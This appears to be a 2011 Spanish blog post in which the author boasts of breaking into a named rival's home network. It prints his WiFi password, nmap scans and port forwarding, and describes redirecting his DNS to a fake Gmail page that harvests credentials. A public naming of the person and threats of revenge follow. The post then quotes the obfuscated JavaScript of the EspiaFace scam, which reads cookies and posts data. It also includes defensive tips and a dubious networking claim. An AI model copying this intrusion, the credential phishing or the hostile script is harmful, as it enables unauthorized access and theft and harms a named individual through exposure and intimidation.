timed out Request timed out Ping statistics for 192.168.1.2 Packet: Sent = 4, Received = 0, Lost = 4 (100% loss) --------------- hostname> b4cktr4ck IP addr> 192.168.1.3 MAC addr> 1C:65:9D:98:96:21 Expire t> 1days, 10:31:41 (Time unit: tick. 1 tick = 1/60 second) Ping 192.168.1.3 with 32 bytes of data Request timed out Request timed out Request timed out Request timed out Ping statistics for 192.168.1.3 Packet: Sent = 4, Received = 0, Lost = 4 (100% loss) --------------- hostname> iPod-de-Martini IP addr> 192.168.1.4 MAC addr> 00:26:4A:6F:F9:58 Expire t> 80days, 9:12:49 (Time unit: tick. 1 tick = 1/60 second) Ping 192.168.1.3 with 32 bytes of data Request timed out Request timed out Request timed out Request timed out Ping statistics for 192.168.1.3 Packet: Sent = 4, Received = 0, Lost = 4 (100% loss) --------------- hostname> Domi IP addr> 192.168.1.5 MAC addr> 64:B9:E8:4B:D2:86 Status> Auto Expire t> 89days, 23:37:21 (Time unit: tick. 1 tick = 1/60 second) Ping 192.168.1.5 with 32 bytes of data Reply from 192.168.1.5: byte = 32 time = 170 Reply from 192.168.1.5: byte = 32 time = 210 Reply from 192.168.1.5: byte = 32 time = 120 Reply from 192.168.1.5: byte = 32 time = 150 Ping statistics for 192.168.1.5 Packet: Sent = 4, Received = 4, Lost = 0 (0% loss) Approximate round trip times in milli-seconds: Minimum = 120, Maximum = 210, Average = 162 --------------- hostname> IP addr> 192.168.1.6 MAC addr> D4:5D:42:88:E1:77 Expire t> 1days, 12:33:25 (Time unit: tick. 1 tick = 1/60 second) Ping 192.168.1.6 with 32 bytes of data Request timed out Request timed out Request timed out Request timed out Ping statistics for 192.168.1.6 Packet: Sent = 4, Received = 0, Lost = 4 (100% loss) --------------- hostname> b4cktr4ck IP addr> 192.168.1.7 MAC addr> F0:4D:A2:5A:19:D3 Expire t> 2days, 20:50:10 (Time unit: tick. 1 tick = 1/60 second) Ping 192.168.1.7 with 32 bytes of data Reply from 192.168.1.7: byte = 32 time = 0 Reply from 192.168.1.7: byte = 32 time = 0 Reply from 192.168.1.7: byte = 32 time = 0 Reply from 192.168.1.7: byte = 32 time = 0 Ping statistics for 192.168.1.7 Packet: Sent = 4, Received = 4, Lost = 0 (0% loss) Approximate round trip times in milli-seconds: Minimum = 0, Maximum = 0, Average = 0 Me pregunto si hay otra forma de saber más información sobre estas computadoras, el sargento Schwartz del hemisferio derecho de mi cerebro nos trae una idea: buscar los manufacturadores por la dirección MAC de las placas de red. Los primeros 3 octetos de la dirección MAC se llama OUI (Organizationally Unique Identifier/Identificador Único de Organización) la cual posee la identificación del fabricante, esto nos puede ampliar un poco más el panorama hostname> casa IP addr > 192.168.1.2 MAC addr> 00:0E:A6:74:F3:A6 (ASUSTEK COMPUTER INC.) hostname> b4cktr4ck IP addr > 192.168.1.3 MAC addr> 1C:65:9D:98:96:21 (Liteon Technology Corporation) hostname> iPod-de-Martini IP addr > 192.168.1.4 MAC addr> 00:26:4A:6F:F9:58 (Apple, Inc) hostname> Domi IP addr > 192.168.1.5 MAC addr> 64:B9:E8:4B:D2:86 (Apple, Inc) hostname> IP addr > 192.168.1.6 MAC addr> D4:5D:42:88:E1:77 (Nokia Corporation) hostname> b4cktr4ck IP addr > 192.168.1.7 MAC addr> F0:4D:A2:5A:19:D3 (Dell Inc.) Excelente, ahora tenemos las IP internas de la red de Lamer-Lengua y sabemos sobre las marcas que usa y podemos inferir sobre los sistemas operativos que probablemente habrá en ellas, sin siquiera iniciar un OS fingerprinting. Los ping responden muertos menos el último... mmm ¿tendrán firewall? ¿Valdrá la pena un escaneo de puertos? Por cierto, ¿dos máquinas con Backtrack?, momento... el muchacho escribe l33t speech para sus hostnames... me pregunto ¿quizás lo use también esa escritura para su contraseña WiFi? Otro escuadrón de scouts ha sido encomendado para echar un vistazo y nos ha traido el siguiente reporte de campo: WIRELESS CONFIGURATION: --------------------------------- 802.11 b/g Broadcast SSID: YES SSID: Te metes y te hackeo (ORLY?) Authentication Type: WPA-PSK Encryption: TKIP Password: S@n1gnaci0 ¡Sí señor!, se ha confirmado que le gusta usar l33t speech para la creación de contraseñas. Otro dato más para el perfil psicológico, el escuadrón de PsyOPS (Operaciones Psicológicas) ha tomado nota. En el SSID ha puesto un cartel similar a "Cuidado con el Perro", sólo que no había perro. Una vez que los escuadrones scouts cumplieron con sus reportes de campo, se ha transmitido la inteligencia recabada hacia los batallones de infantería. Día T+2: Invasión de Trollandía El primer batallón ha lanzado su primera embestida hacia el objetivo designado por los altos comandos: "b4cktr4ck". Para poder escanear los puertos de las computadoras internas se han redirigido TODOS los puertos del router hacia el host b4cktr4ck. Luego de abrirle la NAT ( "abrir los puertos" ), le hago otro scan al ip del router en el rango de puertos que acabo de abrir. $ nmap -sSU --reason -Pn -T4 -O -v -p81-6000 190.234.18.XXX Starting Nmap 5.51 ( http://nmap.org ) at 2011-04-28 03:54 Eastern Daylight Time Initiating Parallel DNS resolution of 1 host. at 03:55 Completed Parallel DNS resolution of 1 host. at 03:55, 0:03s elapsed Initiating SYN Stealth Scan at 03:55 Scanning 190.234.18.XXX [5920 ports] Completed SYN Stealth Scan at 03:55, 49.67s elapsed (5920 total ports) Initiating UDP Scan at 03:55 Scanning 190.234.18.XXX [5920 ports] UDP Scan Timing: About 47.02% done; ETC: 03:56 (0:00:35 remaining) Completed UDP Scan at 03:57, 100.86s elapsed (5920 total ports) Initiating OS detection (try #1) against 190.234.18.XXX Retrying OS detection (try #2) against 190.234.18.XXX Nmap scan report for 190.234.18.XXX Host is up, received user-set (0.11s latency). Not shown: 5923 closed ports, 5915 open|filtered ports Reason: 5918 resets, 5915 no-responses and 5 port-unreaches PORT STATE SERVICE REASON 520/tcp filtered unknown no-response 1720/tcp filtered H.323/Q.931 no-response Warning: OSScan results may be unreliable because we could not find at least 1 o pen and 1 closed port Aggressive OS guesses: Sun OpenSolaris 2009.06 (92%), Sun Solaris 10 (92%), Sun Solaris 8 (SPARC) (92%), 2Wire 2701HG-G wireless ADSL modem (91%), Cisco Adaptiv e Security Appliance (PIX OS 7.2) (91%), 2Wire 2700HG-B wireless ADSL modem (90% ), Acorp W400G or W422G wireless ADSL modem (MontaVista embedded Linux 2.4.17) ( 90%), Actiontec GT701 DSL modem (90%), AT&T NetGate SG8100 router (90%), AVM FRI ITZ!Box FON WLAN 7050, Linksys WAG200G, or Netgear DG834GT wireless broadband ro ter (90%) No exact OS matches for host (test conditions non-ideal) Network Distance: 0 hops Los resultados de esta campaña (redirigir todos los puertos hacia cada computadora interna y escanearlo) tuvo un resultado muy pobre, como me lo esperaba. Cada computadora tiene firewall propio. Es el primer contratiempo de esta batalla. No podemos penetrar un sistema con una conexión directa si tienen firewall. ¿Qué hacemos?, ¿ya está? ¿Cagamos? Quizás no podamos penetrar el terreno enemigo, pero nosotros podemos controlar sus rutas de comunicaciones. Siguiendo los ejemplos del gran guerrero y comandante Ghenghis Khan, he planeado sitiar su red y controlar todo lo que entra y sale de esa red hacia la internet. Ya sea el IPOD de Martini o la computadora Dell con Backtrack o el celular Nokia que usan el WiFi, TODO el tráfico será redirigido: Tráfico Normal """""""""""""" ______________________________ ______________________________ ________________ ( (casa) (Ipod.de.Martini) )=====>(¿La ip de gmail.com??) | | | ( (B4cktr4ck) ) | (¡Es esta 74.125.113.106!)===>| Gmail.com | (______________________________) |______________________________| |_______________| Red Privada de Lamer.Lengua DNS de Telefónica de Perú Se conecta a Gmail Está configurado con el Le encuentra la IP de Google (74.125.113.106) DNS Telefónica de Perú La estrategia """"""""""""" ______________________________ ______________________________ ________________ ( (casa) (Ipod.de.Martini) )=====>(¿La ip de gmail.com??) | | | ( (B4cktr4ck) ) | (¡Es esta 192.168.1.3!!)=====>| Gmail.Falso | (______________________________) |______________________________| |_______________| Red Privada de Lamer.Lengua DNS FALSO Bienvenidos a mi PC Reconfigurado para usar un Programado para resolver gmail.com (192.168.1.3) DNS FALSO EN MI PC hacia la IP interna en mi máquina ¡Manos a la Obra soldado! PVC VPI/VCI IP Address Subnet GateWay DNS Server Encapsulation Status PVC0 1/32 N/A N/A N/A N/A Bridge Up PVC1 0/33 N/A N/A N/A N/A Bridge Up PVC2 0/35 N/A N/A N/A N/A Bridge Up PVC3 0/100 N/A N/A N/A N/A Bridge Up PVC4 8/35 0.0.0.0 0.0.0.0 192.168.81.1 200.48.225.130 PPPoE Down PVC5 8/48 N/A N/A N/A N/A Bridge Up PVC6 0/38 N/A N/A N/A N/A Bridge Up PVC7 8/60 190.234.18.XXX 255.255.255.255 192.168.81.1 200.48.225.130 PPPoE Up En la última línea sólo tengo que modificar el servidor DNS (200.48.225.130) por el DNS Falso alojado (XXX.YYY.ZZZ.QQQ) en mi servidor. El DNS Falso reenviará todas las peticiones hacia un DNS Real con la única excepcion de Gmail.com que lo enviará a 192.168.1.3 El resultado: <log.txt> username: testeo@gmail.com | password: testin | IP: 192.168.1.6 username: CLOTILDObiskit@gmail.com | password: ?¿?¿?¿?¿?¿?¿? | IP: 190.234.18.XXX Totalmente excitado y feliz abro el Firefox y me dirijo hacia Gmail para husmear los mails de este peruano mediocre, tipeo el user y el password temblando de la emoción. "Tacatac, tracatac", y el tipeo triunfal de la última letra de la contraseña: "tac". Microsegundos antes de presionar la tecla Enter escucho un sonido lejano y extrañamente familiar. "Cu-cu" ─¿Qué hacés?─era Naty de nuevo. De alguna forma esa simple pregunta causó un buffer overflow en mi mente. Mi dedo se congela flotando a nanómetros de distancia de la tecla Enter y observo estupefacto el cursor de texto parpadeando sobre el campo de la contraseña. Dudo. Mi baño es invadido por un silencio sepulcral durante 5 interminables segundos, hasta que mi mente rebootea y mi mano entra en modo recovery. Muevo el mouse. Inspiro. Exhalo. Presiono sobre la X. ─Nada, ¿vos? - - - La Lección No cometan errores de principiante: No dejen la contraseña de fábrica A veces uno siente que estar detrás de un router es automáticamente más seguro ya que sus computadoras están separadas de Internet. Pero esa seguridad es ilusoria si tienen el router mal configurado. La IP interna de la red local (LAN) es como número de teléfono interno de una compañía. Vos llamás a los teléfonos públicos de la empresa, la recepcionista (La NAT, que está en el router) se encarga de redirigir la llamada. La NAT filtra todas las llamadas de los acreedores, su suegra y telemarketers ("No, el señor no se encuentra en este momento" ), mientras que sí pasa las llamadas de personas que el presidente está esperando recibir ("sí, el señor le estaba esperando, ahora lo comunico" ). Tener esta recepcionista le da cierto nivel de seguridad, se comporta como un firewall pasivo ya que nadie puede molestar al presidente de la empresa llamándolo en forma directa. Cuando nosotros "abrimos un puerto" o "redirigimos un puerto" (forward port) es cuando le decimos a la NAT: "mirá, si alguien llama a este número transferime la llamada hacia mi oficina, quien quiera que sea". En el mundo real la secretaria es controlada únicamente por las órdenes del presidente. En el mundo de las computadoras, la NAT es controlado por quien tiene la contraseña. Si otra persona tiene la contraseña de tu router, le puede ordenar a la NAT: "redirigí todas las llamadas, de todos los teléfonos públicos hacia la extensión del teléfono del presidente", y de esta forma obtiene acceso interno desde afuera como sucedió en mi historia con Lamer-Lengua. Pero si tenía contraseña no podías hacerle nada, ¿o si? Muchos de ustedes piensan (como muchos me han comentado) que la NAT es suficientemente segura si es que tiene una contraseña compleja, sin el firewall del router activado. Estimados, ese es otro error común. La NAT es fácilmente manipulable. La secretaria puede filtrar las llamadas no deseadas, pero no es suficientemente inteligente como para filtrar estafadores. Veamos el caso de la Suegra (representa usuarios comunes sin habilidades técnicas) elusuarioNORMAL dijo:NAT: -Hola, soy Naty, ¿en que le puedo ayudar? Suegra: -Soy la suegra NAT: -Número equivocado. Suegra: -¡Andate a la reput...! (cuelga) Ahora veamos el caso del estafador (un atacante aceitado con habilidades técnicas): elprofesional dijo:NAT: -Hola, soy Naty, ¿en que le puedo ayudar? Estafador (llamando desde un número interno): -Hola Naty, soy el presidente, estoy esperando la llamada de Estafador, pasame la llamada ni bien te llame. NAT: -Sí señor. Estafador (llamando desde afuera): -Hola, soy Estafador NAT: -Le comunico la llamada. (transfiere la llamada)De esta forma SIN SABER LA CONTRASEÑA se puede manipular la NAT. ¿Cómo hizo el estafador para comunicarse como si fuera de adentro? Ah, esa es oootra historia aparte, pero es totalmente realizable Esto es una explotación del diseño del NAT y no hay forma de solucionarlo. Activen el Firewall en el router y en su sistema operativo, no sean giles. (No me envíen MPs al respecto, no voy a profundizar más el tema) El propósito de este post ha sido para ayudar a prevenir errores básicos y muy fácilmente prevenibles, sigan los siguientes consejos: 1) Jamás dejen routers con la contraseña por defecto. Cambien la contraseña inmediatamente al comprarse un Router nuevo. 2) Jamás permitan conexión remota del router desde Internet (WAN). (Aplicado para el 99% de la gente que no lo necesita, y si sos del 1% que lo necesita, no creo que necesites de consejos.) 3) Siempre activen el firewall y el SPI en el router. El SPI es un analizador de tráfico, es una barrera extra de seguridad. Les repito: deben-activar-SPI si pueden. 4) Instalen la Barra de Netcraft para prevenir Phishing. 5) Y Nunca escupan para arriba... Y les reitero, este no fue un ataque sofisticado, aunque sí he capitalizado de sus errores negligentes (e ignorantes) al máximo. Este fue un ataque muy muy estúpido. Mi mamá tiene su red 1000% más segura que la del "experto en seguridad" Lamer-Lengua. Viendolo desde otra forma, mi mamá le Ownea 1000%. Espero que lo hayan disfrutado -Nano SIMON dijo:Rincón de preguntas y respuestas, enviadas por lectores via MP: >El 29.04.2011 a las 19:07:51, xxxxming escribió: >Nano capo!! La verdad te felicito por todo lo que sabes. > >Te cuento que quiero aprender hacking, siempre me interesó, pero hay tanto x saber que no se por donde arrancar, qué investigar, qué aprender primero.. > >Qué me recomendas? > >Un abrazo El termino hacking es muy ambiguo. El hacking de los medios significa ser un pirata informatico, alguien que accede a sistemas ilegalmente con la computadora. El hacking para los que creen saber de hacking, es alguien que es alguien que penetra pero no destruye sistemas. Enfatizan que penetrar y destruir es "cracking". La verdad de la milanesa: El hacking en programación significa arreglar un error o resolver un problema en forma creativa, "atar con alambres". La diferencia de la defincion de cracker y hacker quedó en los 80. Hoy nadie serio le da bola a esa distinción anticuada, hoy en día se usan los términos más específicos: white hat, gray hat y black hat, categorizados por la ética y la moral del hacker. El hacking es una filosofía, un estilo de vida, y no solo se limita a las computadoras. Básicamente es aquella persona que tiene sed de conocimientos, altamente curiosa y que trata casi obsesivamente de entender cómo funcionan las cosas. Si querés aprender hacking, tenés que entender que el hacking es una actitud, no técnicas. El perfecto arquetipo del hacker es "MacGyver". Si te interesa la seguridad informatica, tenés que entender que en el dia de hoy existen muchas subespecialidades. Podés enfocarte en programacion/ingenieria inversa/virus. Podés enfocarte en redes/administracion de sistemas. Podés enfocarte en criptanálisis/criptografía. Podés enfocarte en phreaking y telecomunicaciones. Podés enfocarte en seguridad de hardware. Podés enfocarte en informática forense. Podés enfocarte en seguridad física (aunque esto no tiene mucho que ver con la informatica, es la barrera NRO 1. Si te roban el disco rigido, cagaste. Si tienen acceso local al servidor, cagaste. La seguridad física es muy importante.) Y muchos, etceteras Hoy en día la seguridad informática es toda una profesion y una disciplina que tiene muchas especialidades, y no hay un "hacker" que sea "un experto en todo". La mayoría es experto en un área muy específica y tiene conocimientos superficiales del resto. Los pentesters (auditores de seguridad) son generalmente equipos formados con expertos en cada área, incluyendo cerrajeros (y ustedes que pensaban que era joda lo de la seguridad fisica) Yo no soy hacker, apenas sé programar, pero sé como funciona la comunidad de la seguridad informática. Mamé la cultura hacker desde pendejo, pero me terminé en otra área académica que no tiene nada que ver con las computadoras. Y si ya tenés la actitud y sólo necesitas técnicas, empezá por lo básico. 1) Aprendé inglés. 2) Mantenete informado y preparate para leer trabajos académicos de las investigaciones en las universidades y los informes de los consultores de seguridad: ahí vas a aprender realmente, no de ezines y foros de hacking. 99% de los foros y sitios web de Hacking son lamers y script-kiddies que están en una nube de pedos. 3) Hacé las paces con las matemáticas, ella es tu aliada. Las matemáticas es un lenguaje, y debería ser tu primer "lenguaje". 4) Aprendé algo de programación, sea el lenguaje que sea. 5) Aprendé algo de de redes. 6) Y empezá adquiriendo buenas costumbres: usá linux. 7) Leete "El Arte de la Guerra" de Sun Tzu y "Del Arte de la Guerra" de Nicolás Maquiavelo. Lo que describo medio en joda como operación militar en este post, en realidad son perfectas analogías a las guerras reales. La guerra es un estado mental, es pura estrategia y por eso es siempre perenne. Dicen que la curiosidad mató al gato. Yo les digo, la curiosidad lo hizo hacker. -nanoOtra pregunta frecuente enviado por lectores via MP: >El 30.04.2011 a las 00:13:53, xxxri_14 escribió: >Capo! Estuve viendo el post del "Nanocurso" y anteriormente el que deschavas a EspiaFace, y me encantaron! >La verdad que muy buen laburo, y lo potencias con un gran humor. >En fin, vamos al grano. En el post del Nanocurso, en una de las recomendaciones decís que hay que tener activado el Firewall y el SPI. >El problema es que no se que es el SPI y no se si está activado o no. Y en caso de que no lo esté, desconozco como activarlo. >Tendrías la amabilidad de explicarme como hacerlo? >Desde ya te agradezco, un abrazo grande! Eso depende de tu Router. Fijate en el Manual. Genrealmete lo van a encontrar bajo las siglas SPI (Stateful Packet Inspection), pero tambien es conocido como "stateful firewall", "Packet Filter firewall", "Dynamic Packet Filter". Básicamente lo que hace es filtrar los paquetes hasta la capa de aplicación (séptimo nivel del modelo OSI) activamente (sniffea la conexión y monitorea código malicioso). Si no tiene SPI, al menos asegurate de que tengas el firewall activado. Algunos firewalls no especifican que tienen "SPI", pero lo tienen todo junto "integrado" con el Firewall. Pero OJO que Windows 7 y Windows Vista SON INCOMPATIBLES CON SPI. Linuxeros, no se alegren tanto que Linux también es incompatible desde el Kernel 2.6.8 en adelante. >Una pregunta relacionada que me hicieron con respecto a la respuesta anterior: >El 30.04.2011 a las 03:29:52, xxxenph escribió: >primero, te felicito > >segundo >dijiste >"Pero OJO que Windows 7 y Windows Vista SON INCOMPATIBLES CON SPI." > >tenes alguna explicacion (logica comercial o alguna explicacion realista) de por que existe esa incompatibilidad? (solo me interesa aprender, no tengo otra intencion) > > >y segui escribiendo esos posts, te lo suplica taringa Se debe al escalado de la ventana TCP, que es aumentar el tamaño de la ventana más allá de su valor máximo de 65,535 bytes para aumentar el ancho de banda. Este aumento de ancho de banda es necesario para mantener las velocidades en redes que tienen latencias altas (como conexiones satelitales) Algunos routers con SPI tienen problemas con este escalado de la ventana. Saludos, -nano

Plagio: (Del lat. plagiāre) Copiar en lo sustancial obras ajenas, dándolas como propias. (RAE) Lista de Plagiadores: + Martin Gonzalo Lengua-Olivares (PATETICO LAMER PERUANO), de "CholoHack.com". Se la dan de expertos en informática, pero al parecer desconocen de la ética hacker, el copyleft y carecen totalmente de honor. Literalmente pone: "según he estado averiguando el porqué de esta creación tan jodida del Facebook". Para colmo algunos portales de noticias (peru.com) lo citan a él como el autor de esta investigación. Esto es absurdo. Claro, yo lo publiqué un día antes porque tengo un Delorean, ¿no?... o quizás, digo yo, se me ocurre la loca idea de que quizás soy el autor original. 27-Abril|4:00 am> Patetismo al extremo: cuando pensaba que no se podía caer más bajo, el plagiador Martin Gonzalo Lengua Olivares ( @martinzho ) me demostró todo lo contrario. Acaba de enviarme un MP diciendo que fue un "malentendido". Fui a su página para ver si ha modificado algo para pedir disculpas. Sí, ha modificado algo: la fecha de posteo (el lo posteó April 26, ahora dice April 25) para coincidirlo con la fecha de creación de mi post. Parece que se avivó al leer mi argumento sobre el Delorean, razonó que no es posible acusarme de tener una máquina del tiempo, por lo que se apuró a tapar esta paradoja temporal modificando la fecha de posteo en su patético sitio. Pero el IMBÉCIL se olvidó de que Google indexa las páginas, si se busca el título de su archivo plagiado aparece la fecha original: 26 de Abril. (Click acá para ver screen shot de Google) ¿Otro malentendido Martín Lengua?: esta es la segunda advertencia y última. No va a haber una tercera. 28-Abril|00:00 am> No me tientes a que yo lance "mi malentendimiento", te quedan seis horas para pedir disculpas públicas. 28-Abril|08:00 am> Time's up. Jaja, no te imaginás el infierno que te espera. 29-Abril|00:00 am> El Infierno laposta dijo:Sobre los creadores del sitio EspiaFace: + Tengo los nombres de todos los implicados. Conflictos sobre la autoría. En investigación. + Detalle sobre lo que anda pasando: Mi Buzon de Mensajes Privados se convirtió en un conventillo. Todos los presuntos acusados se están arañando entre ellos. Todos se contactaron conmigo directamente por MP y todos se acusan entre ellos. Fuera de joda, entre los acusados apareció el hermano de Pamela David (celebridad argentina) Las pruebas se van acumulando y las pesas se inclinan. + ULTIMO MOMENTO: Ahora sí, la web de www.EspiaFace.com está finalmente hackeada... ¿o lo está?... Advertencia: Mucho, mucho, pero mucho texto con contenido real y propio a continuación. Si tenés alergia a la lectura, naciste medio bobo o si todavía sos analfabeto, mejor que te vayas a la mierda. Con cariño, nanopene En este post voy a usar vocabulario muy preciso, porque hoy me levanté con ganas de ser nerd: + Si digo posible, es posible y no probable. + Si digo probable, es probable y no posible + Si digo estimado, es estimado y no querido. + Y si digo almeja es la que encontrás entre la arena, no entre las piernas Espiando a Espiaface.com: El objetivo al desnudo p o r n a n o p e n e (Taringa) Perdon por el chasco, hoy debería haberles traido el cuarto capítulo. Pero estoy tan pero tan harto de que me envíen las invitaciones de "Averigua quién visita tu perfil" que se me escapó todo el sentido del humor y me concentré en analizar esta epidemia. A continuación, un análisis muy objetivo. Si les digo que es la posta, es la posta. Si les digo que es aproximación, es aproximación. Y si no te gusta, no te gusta. Y si no te gusta, te podés ir a la reconch... eeh re cebado. Si, re cebado. Hoy tengo ganas de destripar al infame Espiaface, código por código y analizarlo para explicarles EXA-CT-A-ME-NT-E (las sílabas para la mierda, repetí primer grado): CUAL CARAJO ES EL OBJETIVO DEL AUTOR DE ESTA MIERDA, QUE GANA CON ESTA MIERDA Y CUANTO GANA (estimación) Según estuve viendo, nadie en internet (tanto en inglés como en español) explica con el nivel de detalle que expongo acá. Muchos, incluso especialistas, están aún rascándose las cabezas porque no entienden el fin de esta falsa aplicación de Facebook que pareciera ser el producto de una masturbación mental de alguien que tuvo demasiado tiempo libre en sus manos. Hoy en día no existe ningún programa o app de Facebook que te permita ver quién te visitó el perfil. Está absolutamente prohibido por Facebook y es técnicamente imposible actualmente. Pero sí solía existir unos apps hace un par de años que se aprovechaba de un error de programación de Facebook para saber qué usuario visitó tu perfil, pero ya está arreglado y hoy en día no existe ninguna forma de saber qué usuario en específico acaba de visitar tu perfil. Hoy es simplemente usado como cebo para atraer salames. (Y si llegara a descubrirse otro error de programación, duraría muy poco, ya que Facebook activamente monitorea, bloquea y arregla problemas de esta índole) Todos sabemos para esta altura que "espiaface.com" no cumple con lo que promete, pero antes les quiero tranquilizar diciéndoles primero lo que no es: 1) NO es un virus (ni worm, ni troyano, ni ataque de XSS, ni explota vulnerabilidades del navegador) 2) NO roba contraseñas de facebook 3) NO roba cookies (no roba sesiones de Facebook) 4) NO accede a tu información privada del perfil (en esta variante en específico) 5) NO es una Aplicación de Facebook (No instala nada, no queda residente, nada) Facebook sí ofrece tu información privada en bandeja de plata a CUALQUIER aplicación de facebook. Si, todos los jueguitos, tests de psicologia ("¿Sos más pelotudo que el promedio?" ), O chimentos "¿Qué dijo fulano de mengano?", "¿Querés saber quién dijo que sos una trola?" y todas las porquerias esas obtienen acceso y control completo de tu perfil cuando presionás "Permitir". En una ventana como esta, es cuando estás "instalando" un App de Facebook. El botón Permitir, permite al App el acceso irrestricto a toda tu información privada de tu perfil, control de posteo en tu cuenta y todo lo que te describe ahí. Esto es totalmente independiente a tu configuración de privacidad, aunque estés en modo superparanoico, con "Solo Amigos" y "Solo Yo", estos Apps tienen acceso completo cuando les das el permiso. Si fuiste victima de EspiaFace, sabrás que no presionaste "Permitir" en ningún lado, eso se debe a que EspiaFace no es una aplicación de Facebook. Eso por una parte es una buena noticia, ya que tenemos la tranquilidad de que no obtiene los datos privados por defecto y tampoco hay que "desinstalar" nada de Facebook. Pero bien podría haber sido todo lo anterior: Sí podría haber sido un virus creando un lindo botnet de la San Puta. Sí podría haberte robado la cuenta de Facebook. Sí podría vender tu información privada al mejor postor para que te espameen de lo lindo o le vendan tu información a delincuentes para que te hagan un secuestro virtual. Tenemos que darle gracias (?) al autor de Espiaface por meterte el dedo en el culo sólo hasta el esfinter, cuando tranquilamente podría habértelo metido hasta el intestino grueso. Si caiste esta vez, zafaste. La próxima vez que caigas en una trampa de este calibre puede que pierdas la cuenta de facebook, pierdas el control de tu computadora, pierdas ancho de banda y hasta pierdas la virginidad. Ahora vamos al grano (del culo -digo- de Espiaface) Si fuiste uno de los papanatas que fueron a espiaface.com se van a encontrar con esto: Primero nos tienta con una imagen photoshopeada, mostrando las visitas a tu perfil en tu "Notificaciones". Cuando presionamos Siguiente, nos topamos con la siguiente pantalla: Nos muestra un código para poner en Facebook. Si se fijan bien, ese código llama un archivo de javascript llamado app.js para hacer el trabajo sucio, ¿por qué nos pide que esperemos 2 a 3 minutos? ¿Qué carajo hace el código? veamos su contenido: (prepárense para un scroll largo...) var _0x3fe9=["x25x66x69x72x73x74x6Ex61x6Dx65x25x20x6Dx69x72x61x20x65x73x74x6Fx20x71x75x65x20x65x73x20x69x6Ex63x72x65x69x62x6Cx65x2Cx20x74x65x20x70x65x72x6Dx69x74x65x20x76x65x72x20x71x75x69x65x6Ex65x73x20x76x69x73x69x74x61x6Ex20x74x75x20x70x65x72x66x69x6Cx20x79x20x66x75x6Ex63x69x6Fx6Ex61x20x62x69x65x6Ex2Cx20x65x6Ex74x72x61x20x61x3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6D","x54x6Fx70x20x64x65x20x76x69x73x69x74x61x6Ex74x65x73x20x64x65x20x74x75x20x70x65x72x66x69x6Cx20x64x65x20x68x6Fx79x3Ax20x0Ax20x25x74x66x25x20x2Dx20x31x39x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x36x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x35x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x33x20x76x69x73x69x74x61x73x20x0Ax20x41x76x65x72x69x67x75x61x20x74x75x20x74x61x6Dx62x69x65x6Ex20x71x75x69x65x6Ex20x74x65x20x65x73x74x61x20x6Dx69x72x61x6Ex64x6Fx20x65x6Ex74x72x61x6Ex64x6Fx20x65x6Ex3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6Dx0Ax46x75x6Ex63x69x6Fx6Ex61x20x64x65x20x76x65x72x64x61x64x21","x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex65x73x70x69x61x66x61x63x65x2Ex63x6Fx6Dx2Fx63x61x72x67x61x2Ex70x68x70","x45x73x74x6Fx20x65x73x20x69x6Ex63x72x65x69x62x6Cx65x21x20x70x75x65x64x65x6Ex20x76x65x72x20x71x75x69x65x6Ex20x65x73x74x61x20x76x69x73x69x74x61x6Ex64x6Fx20x73x75x20x70x65x72x66x69x6Cx20x79x20x74x65x20x6Cx6Cx65x67x61x6Ex20x6Ex6Fx74x69x66x69x63x61x63x69x6Fx6Ex65x73x2Cx20x73x69x67x61x6Ex20x6Cx6Fx73x20x70x61x73x6Fx73x20x64x65x20x65x73x74x61x20x70x61x67x69x6Ex61x20x71x75x65x20x65x78x70x6Cx69x63x61x20x63x6Fx6Dx6Fx20x68x61x63x65x72x6Cx6Fx2Cx20x65x6Ex74x72x65x6Ex20x65x6Ex3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6D","x41x76x65x72x69x67x75x61x20x71x75x69x65x6Ex20x76x69x73x69x74x61x20x74x75x20x70x65x72x66x69x6C","x68x72x65x66","x6Cx6Fx63x61x74x69x6Fx6E","x74x6Fx70","x47x45x54","x6Fx70x65x6E","x6Fx6Ex72x65x61x64x79x73x74x61x74x65x63x68x61x6Ex67x65","x72x65x61x64x79x53x74x61x74x65","x73x74x61x74x75x73","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x73x65x6Ex64","x2F","x6Dx61x74x63x68","x63x6Fx6Fx6Bx69x65","x40x5B","x69x64","x3A","x6Ex61x6Dx65","x5D","","x26","x3D","x50x4Fx53x54","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x64x69x76","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x64x69x73x70x6Cx61x79","x73x74x79x6Cx65","x62x6Cx6Fx63x6B","x70x6Fx73x69x74x69x6Fx6E","x61x62x73x6Fx6Cx75x74x65","x77x69x64x74x68","x31x30x30x25","x68x65x69x67x68x74","x6Cx65x66x74","x30x70x78","x74x65x78x74x41x6Cx69x67x6E","x63x65x6Ex74x65x72","x70x61x64x64x69x6Ex67","x34x70x78","x62x61x63x6Bx67x72x6Fx75x6Ex64","x23x46x46x46x46x46x46","x7Ax49x6Ex64x65x78","x69x6Ex6Ex65x72x48x54x4Dx4C","x20x3Cx62x72x2Fx3Ex3Cx62x3Ex43x61x72x67x61x6Ex64x6Fx20x61x70x6Cx69x63x61x63x69x6Fx6Ex2Cx20x61x67x75x61x72x64x65x20x75x6Ex20x6Dx6Fx6Dx65x6Ex74x6Fx2Ex2Ex2Ex3Cx2Fx62x3Ex3Cx62x72x2Fx3Ex3Cx62x72x2Fx3Ex20x4Cx61x20x61x70x6Cx69x63x61x63x69x6Fx6Ex20x65x73x74x61x20x70x72x65x70x61x72x61x6Ex64x6Fx20x74x75x20x66x61x63x65x62x6Fx6Fx6Bx20x70x61x72x61x20x72x65x67x69x73x74x72x61x72x20x6Cx61x73x20x76x69x73x69x74x61x73x20x64x65x20x74x75x73x20x61x6Dx69x67x6Fx73x2Ex3Cx62x72x2Fx3Ex3Cx62x72x2Fx3Ex3Cx69x6Dx67x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx